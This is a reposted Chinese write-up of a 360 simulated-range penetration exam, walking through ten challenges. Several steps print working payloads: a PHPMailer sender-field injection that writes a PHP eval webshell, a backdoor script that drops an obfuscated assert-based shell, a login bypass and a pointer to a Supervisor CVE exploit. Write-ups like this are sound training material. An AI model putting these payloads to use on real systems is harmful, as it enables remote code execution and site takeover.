专栏首页Timeline Sec记一次360众测仿真实战靶场考核WP

记一次360众测仿真实战靶场考核WP

1,微信 User-Agent头伪造

User-Agent: Mozilla/5.0 (iPhone; CPU iPhoneOS 8_0 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12A365MicroMessenger/6.0 NetType/2GChrome/80.0.3987.149 Safari/537.36

2,PHPMailer远程命令执行漏洞

email填写:

"xxx". -OQueueDirectory=/tmp/. -X/var/www/html/xxxx.php @xxx.com

message填写:

<?php @eval($_GET[a]);?>

就会生成一个 xxxx.php,内容是 message填写的内容,访问即可getshell。

3,登录框SQL盲注

跑了半个多小时盲注。密码32位的还有两个。。。差点心态崩了。然后突然想起。。登录框注入。。。万能密码不就好了吗。。。

4,Supervisor远程命令执行漏洞(CVE-2017-11610)

https://blog.51cto.com/eth10/1955450 直接用exp秒

5,Referer来源伪造

burp把Referer改成他要的那个Referer就好了

6,一个很简单的代码审计,也称不上代码审计的审计

代码如下:

<?php
    if(!empty($_GET[1]) && $_GET[1]=='GET.fPZ87')    {
        $_=@fopen('t.php', 'a');
        @fwrite($_,"<?php \$_=str_replace('ilo','ass',str_replace('vey','ert',\$_GET[2]));
        @\$_(\$_POST[1]);?>");
        @fclose($_);
         }
?>

先带个 ?1=GET.fPZ87 访问之,然后就会生成一个t.php,访问t.php的时候get带上 ?2=ilovey 然后POST带上 1=php代码就好了。

7,PHPCMS v9.1.x的

只有一个前台,其他功能用不了。想登录二维码也没有,当时没时间就没做了

8,一个加解密啥的。是一个exe,吃了不会反编译的亏

9,wireshark分析数据包的。还挺简单。有技巧的查找

搜索php找到上传的马。然后看那个马干了啥就好了。

10,wireshark分析数据包的。也挺简单。有技巧的查找

找上传者的ip地址。一个技巧:把POST请求的数据包筛选出来。然后从第一个POST请求数据包开始提交IP地址。过滤PHP,POST,HTML

最终总结:

一开始做的时候会很慌,特别是我做SQL时间盲注的时候,一点点的出结果,等的人都傻了,还好后面想起可以万能密码登录,就是要随机应变吧,思路灵活点就好了。放松心态就好做很多。

鄙人不才,像我这种菜鸡。最终也是拿到了分数

相信各位师傅也是可以的,加油冲冲冲!!!

本文分享自微信公众号 - Timeline Sec(PaperPenSec),作者:南方有梦

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-04-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • 严重:PHP远程代码执行漏洞复现

    9 月 26 日,PHP 官方发布漏洞通告,其中指出:使用 Nginx + php-fpm 的服务器,在部分配置下,存在远程代码执行漏洞。并且该配置已被广泛使用...

    Timeline Sec
  • ThinkCMF框架任意内容包含漏洞分析复现

    ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建。 ThinkCMF提出灵活的应用机制,框架自身提供基...

    Timeline Sec
  • HackerOne | Web缓存欺骗攻击

    网站通常倾向于使用Web缓存功能来存储经常检索的文件,以减少来自Web服务器的延迟。

    Timeline Sec
  • 【代码审计】EasySNS_V1.6远程图片本地化导致Getshell

    ESPHP开发框架基础上开发而成的EasySNS极简社区为全新数据库架构和程序结构。本文以EasySNS_V1.6作为代码审计的目标,分享一个远程图片本地化导致...

    Bypass
  • 一次粗心,让我学会了如何搭建php环境,坑越多越有成就感

    线上php程序出现了问题,商品页面无法正常访问,对于java开发工程师来说有一些困难,因为之前没有相关经验,一开始自己内心也是挺排斥的,然而问题摆在那里,只能去...

    用户4361942
  • vscode跳转到函数定义处

    php还需要安装php7, 到官网https://windows.php.net/download#php-7.2

    smy
  • Centos7.3 部署 LAMP 架构动静分离

    一、LAMP动静分离 当需要搭建一个高效的web架构时,采用动静分离无疑是最好的选择,这篇博文将写下来LAMP的动静分离部署方式。

    小手冰凉
  • 任意文件包含漏洞(2)

    操作系统存在最大路径长度的限制。windows系统,文件名最长256个字符,可以输入超过最大路径长度的目录,这样系统就会将后面的路径丢弃,导致扩展名被中途截断

    宸寰客
  • php的各种 I/O流 以及用法

    或许有人看到这个会懵逼,这是什么东东?这有啥用?这咋用?我是谁?我在哪?我要去往何处?

    仙士可
  • 织梦DEDECMS后台精简删除不需要的文件

    如果是一开始就不想要的话,安装版plus目录下进行如下操作。 删除:guestbook文件夹【留言板,后面我们安装更合适的留言本插件】; 删除:task文件夹和...

    ytkah

扫码关注云+社区

领取腾讯云代金券